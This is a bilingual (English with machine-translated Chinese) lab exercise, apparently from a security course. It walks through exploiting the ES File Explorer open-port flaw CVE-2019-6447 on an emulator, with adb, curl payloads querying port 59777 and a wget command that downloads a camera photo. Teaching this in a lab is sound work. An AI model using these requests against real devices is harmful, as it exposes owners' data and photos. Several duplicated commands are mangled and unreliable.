M 207: ES Explorer Command Injection (10 pts) M 207：ES Explorer命令注入（10分）

What You Need for This Project你需要什么这个项目

An Android emulator or device to test the app on用于测试应用的Android模拟器或设备
Android Debug Bridge Android调试桥
You should have that already set up from previous projects您应该已经从之前的项目中设置了该项目

Background背景

ES File Explorer is very popular, with over 100 million downloads. ES File Explorer非常受欢迎，下载量超过1亿。 However, it exposes your phone to remote control over the network.但是，它会使您的手机通过网络进行远程控制。

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447以下是描述漏洞的文章： ES文件资源管理器开放端口漏洞 - CVE-2019-6447

It's very easy to see and exploit.它很容易看到和利用。

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:这是2019年1月16日在Twitter上被删除时的零日攻击：

Start VMware启动VMware

Always launch your Kali virtual machine before you start Genymotion, to avoid VirtualBox networking errors.在启动Genymotion之前始终启动Kali虚拟机，以避免VirtualBox网络错误。

Installing the App安装应用程序

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here .据报道该应用程序已于2019年1月18日进行了修补，因此请在此处下载存档的易受攻击版本。

Drag the APK file onto your Genymotion device and drop it there.将APK文件拖到您的Genymotion设备上并将其放在那里。 Approve the application installation.批准应用程序安装。

Launching the App启动应用程序

Launch the app.启动应用程序。

Click Agree , ALLOW , and " START NOW ", as shown below.单击“ 同意” ，“ 允许 ”和“立即开始 ”，如下所示。

You see information about your files, as shown below.您会看到有关文件的信息，如下所示。

Connecting to your Android Device with ADB使用ADB连接到您的Android设备

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:在Kali上，在终端中，执行这些命令，将IP地址替换为您的Genymotion Android设备的IP地址：

adb connect 172.16.123.154 adb connect 172.16.123.154
adb devices -l adb devices -l

You should see your Genymotion device in the "List of devices attached", as shown below.您应该在“附加设备列表”中看到您的Genymotion设备，如下所示。

Viewing the Listening Process观看听力过程

On Kali, in a Terminal, execute these commands:在Kali上，在终端中执行以下命令：

adb shell adb shell
netstat -pant | netstat -pant | grep LISTEN grep LISTEN
exit出口

You see a process named "com.estrongs.android.pop" listening on port 59777,您在端口59777上看到一个名为“com.estrongs.android.pop”的进程，

The Attack攻击

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:在Kali上，在终端中，执行此命令，将IP地址替换为您的Genymotion Android设备的IP地址：

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://172.16.123.154:59777 curl --header“Content-Type：application / json”--request POST --data'{“command”：“getDeviceInfo”}'http://172.16.123.154:59777

You see information about your phone, as shown below.您会看到有关手机的信息，如下所示。

M 207: ftpPort (10 pts) M 207：ftpPort（10分）

Find the text covered by a green box in the image above.找到上图中绿框所覆盖的文字。 That's the flag.那是旗帜。

Optional: Steal a Photo可选：偷一张照片

If you have a webcam, you can do this.如果您有网络摄像头，则可以执行此操作。

In Genymotion, on the right side, click the Webcam icon, colored pink in the image below.在Genymotion的右侧，单击下图中粉红色的网络摄像头图标。

Adjust the camera to access your host system's webcam, as shown below.调整相机以访问主机系统的网络摄像头，如下所示。

On your Android device, open the Camera app and take a photo, as shown below.在Android设备上，打开相机应用并拍照，如下所示。

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://172.16.123.154:59777 curl --header“Content-Type：application / json”--request POST --data'{“command”：“listPics”}'http://172.16.123.154:59777

Find the path to your image in the output, as shown below.在输出中找到图像的路径，如下所示。

On Kali, in a Terminal, execute this command, replacing the IP address and path to the correct values for your system:在Kali上的终端中，执行此命令，将IP地址和路径替换为系统的正确值：

wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg

The file downloads, as shown below.文件下载，如下所示。

On Kali, in a Terminal, execute this command to view the file, replacing the filename with the correct name on your system:在Kali上，在终端中，执行此命令以查看文件，用您系统上的正确名称替换文件名：

xdg-open IMG_20190116_141301.jpg xdg-open IMG_20190116_141301.jpg

The file appears, as shown below.出现该文件，如下所示。

Testing Security Apps测试安全应用

A student asked what defense will stop this attack.一名学生询问防守会阻止这次袭击。 I can't find any app that does it.我发现没有任何应用程序可以做到这一点。 You could, of course, configure iptables from the command-line, but I haven't found any app that works.当然，您可以从命令行配置iptables，但我没有找到任何有效的应用程序。

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.这是我尝试过的，截止到2019年1月17日，他们都没有阻止攻击。

Norton Mobile Security诺顿移动安全
Kaspersky Mobile Antivirus卡巴斯基手机杀毒软件
Kaspersky Smart Home & IoT Scanner卡巴斯基智能家居和物联网扫描仪
Network Connections网络连接
FREE VPN免费VPN
NetGuard -- crashed Genymotion NetGuard - 崩溃的Genymotion
AFWall+ -- crashed Genymotion AFWall + - 崩溃的Genymotion
Malwarebytes Security恶意软件安全

Converted to a CTF 2-28-19转换为CTF 2-28-19